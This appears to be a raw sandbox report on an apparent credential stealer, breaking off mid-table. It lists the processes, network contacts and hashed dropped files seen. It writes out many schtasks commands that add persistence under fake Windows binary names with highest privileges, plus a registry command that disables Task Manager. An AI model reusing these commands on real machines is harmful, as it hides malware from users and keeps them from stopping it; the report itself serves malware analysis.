schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\INF\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc73393a-21db-4920-aef5-89bb6e511a85.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1fd5334d-3292-4a4f-ba80-ecac0649ffbc.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9845c9f8-f68f-44c0-8a0f-ab509582ad2d.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9553ac34-d8bb-4793-9745-28b9055e89ec.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92b637a2-a0f8-4de9-8f88-3395212ea9ff.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a46ec459-c490-4bc4-95f6-b2f98b27fed0.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\247a55d3-4a2a-4013-90a7-551e0dba8375.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52c39398-c77a-4017-b39e-c4305685083f.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65e39de4-b06e-47c9-a366-406fdb705992.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23970f29-63ea-4a42-89d3-82a0294c6654.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9631333a-2d67-4b6c-ab49-1152cf25e131.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\90768ac9-f677-4eca-bfa6-2c2289da3535.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b3188dd-0e79-4205-9c12-221b928853cf.vbs"
C:\Users\All Users\OfficeClickToRun.exe
"C:\Users\All Users\OfficeClickToRun.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4fb73f37-69ab-4c36-839e-63fba0405246.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\964d59a8-da7c-427a-9df7-83d092a74dec.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0947008.xsph.ru | udp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| US | 8.8.8.8:53 | 103.192.8.141.in-addr.arpa | udp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
Files
memory/3572-0-0x0000000000400000-0x000000000084E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\stealer.exe
| MD5 | 8cc1e7cf94fec9bc505ce7411aa28861 |
| SHA1 | 08703de84f3db427c368f16c873664d78bd83264 |
| SHA256 | cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba |
| SHA512 | fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423 |
memory/2088-62-0x00007FFBA56C3000-0x00007FFBA56C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
| MD5 | 6216b6bef94c09a40bfa263809b1ae56 |
| SHA1 | a928120e65199c6aaae6c991aa0466f3f8b06020 |
| SHA256 | eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b |
| SHA512 | 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215 |
memory/2088-86-0x00000243043D0000-0x0000024304410000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Inject.exe
| MD5 | d428ddd1b0ce85a6c96765aeaf246320 |
| SHA1 | d100efdaab5b2ad851fe75a28d0aa95deb920926 |
| SHA256 | 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb |
| SHA512 | 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899 |
memory/2088-126-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp
memory/4460-127-0x00007FF702DA0000-0x00007FF702DCA000-memory.dmp
C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe
| MD5 | 7c9bb5fda146efee5ee4a243d6e404b0 |
| SHA1 | c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd |
| SHA256 | 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b |
| SHA512 | 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771 |
memory/4772-137-0x000001B9C2140000-0x000001B9C2162000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5s40mlo.qt2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/2088-163-0x000002431EB00000-0x000002431EB76000-memory.dmp
memory/2088-164-0x000002431EB80000-0x000002431EBD0000-memory.dmp
memory/2088-165-0x000002431EA90000-0x000002431EAAE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a58f982c18490e622e00d4eb75ace5a |
| SHA1 | 60c30527b74659ecf09089a5a7c02a1df9a71b65 |
| SHA256 | 4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d |
| SHA512 | ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
memory/2088-202-0x000002431ECD0000-0x000002431ECE2000-memory.dmp
memory/2088-201-0x000002431EAC0000-0x000002431EACA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ec79fae4e7c09310ebf4f2d85a33a638 |
| SHA1 | f2bdd995b12e65e7ed437d228f22223b59e76efb |
| SHA256 | e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a |
| SHA512 | af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625 |
C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat
| MD5 | ea70d7b0f1a8a1ff2d246efbdcfe1001 |
| SHA1 | 252e762aee8fcc5761e17bb84aa3af8276852f5c |
| SHA256 | 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31 |
| SHA512 | 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86 |
C:\MsWinsessiondllNet\driverBrokercommon.exe
| MD5 | d84e590c3715c79dc5b92c435957d162 |
| SHA1 | 2901580903e4b356448d9fe7bea510261e655363 |
| SHA256 | d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba |
| SHA512 | b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485 |
memory/3532-221-0x0000000000830000-0x0000000000A7A000-memory.dmp
memory/2088-225-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp
memory/3532-227-0x00000000013E0000-0x00000000013E8000-memory.dmp
memory/3532-226-0x00000000013D0000-0x00000000013D8000-memory.dmp
memory/3532-228-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/3532-229-0x0000000002CB0000-0x0000000002D06000-memory.dmp
memory/3532-231-0x0000000002D10000-0x0000000002D1C000-memory.dmp
memory/3532-230-0x0000000002D00000-0x0000000002D0C000-memory.dmp
memory/3532-232-0x0000000002D20000-0x0000000002D2C000-memory.dmp
memory/3532-234-0x0000000002D40000-0x0000000002D4A000-memory.dmp
memory/3532-235-0x0000000002D50000-0x0000000002D5E000-memory.dmp
memory/3532-236-0x0000000002E80000-0x0000000002E88000-memory.dmp
memory/3532-237-0x0000000002E90000-0x0000000002E9A000-memory.dmp
memory/3532-233-0x0000000002D30000-0x0000000002D38000-memory.dmp
memory/3532-238-0x0000000002EA0000-0x0000000002EAC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat
| MD5 | 9bb7d27e4566ce09ef791f86b09732fe |
| SHA1 | 9b7e5becf0e6dcf48a2ed150aaad53333bbfb48c |
| SHA256 | ba97fedd893a3a6de6acfd327b5463342a494f539165238e835043fecf6d97d8 |
| SHA512 | f30137d111300079993005ef3232b888515181ed700ac13c66e980f01b1cb98536446027c10d4a6a3c6962a09846b0d1931c97f28b92ddc6c44260e4830fbb9d |
C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs
| MD5 | 0e92844c30f1e233ad4b8044fa3cd673 |
| SHA1 | 080ea409adc4d3744ed5c4712f36ef88a94a375a |
| SHA256 | 2d3ff981e4fe3853973230b37292eee9290362d7a07d9fa0f317c2ffcea3961c |
| SHA512 | a95efc157bfd7ea44965438eb6f2b021434ad052a8dfbab38be476d15fab008cea2efd914f1bfb489e1f1aa8541e2f5164905c0aca998285cce260f0387bb9d4 |
C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs
| MD5 | e10487abf474865152575b2cd81910c0 |
| SHA1 | 4f1c99557da2d0685d6f86e42f5e5bf76c8f5921 |
| SHA256 | 6bd19066ea6ce1863ff93bf9aead7a58ea2332660def11379be9c55d1a03a3bd |
| SHA512 | dc19bda7aeb827158be95c2d2ac9820ece72ad66139847142a155ddab2faf874edb06e60b3f6c2483847edd4af539585de0871d483e2dad3bf3461bd8fc1679b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeClickToRun.exe.log
| MD5 | 5cb90c90e96a3b36461ed44d339d02e5 |
| SHA1 | 5508281a22cca7757bc4fbdb0a8e885c9f596a04 |
| SHA256 | 34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb |
| SHA512 | 63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4 |
C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs
| MD5 | d549be64163140865839441e3ef85f15 |
| SHA1 | 0c0de615fd32af9055dd383956ea9977be025d59 |
| SHA256 | e1334fe8bedb10b2cef710c633d2069c0d53330fc750ac0a863cf7b82cd9cc4e |
| SHA512 | ba7f134bb8adfc57791454fe20df24df94fe9280d0e27e8047d636f2a3ca76d7978417f7e652f98c3ba4c60ce7542a4d5954b9762fdefa501aad2648ed645851 |
C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs
| MD5 | 4f32bce711ca904bb6878ce4bef41d41 |
| SHA1 | a3b6c98a5fa59212895dc2a77318b39b4a7e3f3c |
| SHA256 | 5dac33fef0ff4414fe21e048fce3ddf901526237fb168db55723c975bbc52d1e |
| SHA512 | 4e42efc2ead154c196aa2a5da95c992fe433de998f518b29d51aef64ab95be6256de2dea5ced7ef84e73ff87aae1b2a4caa07ab2af8dabe23dc2efe395b3c1df |
C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs
| MD5 | d86460fade326da57ff0e0a6ce851553 |
| SHA1 | d312d12d6e864dfc628370fb35a637a4360082c3 |
| SHA256 | 35a91c57dd4a033599b4940d426a43d0a91d2c5a1c21d89dd2a287b8face2db4 |
| SHA512 | bc59142fe7ee449925972e9a77ec93490d520af8d02e648f81fe3af8aa7755709e617d1bc83df67400ef3ac115436160a66a38f6b0087d3fbdcfb955049ea004 |
C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs
| MD5 | 6ad35a059bcbda82c5bd886d3717fd49 |
| SHA1 | d8475f059324e5a52e3ea2af8ed9513b22a32e6c |
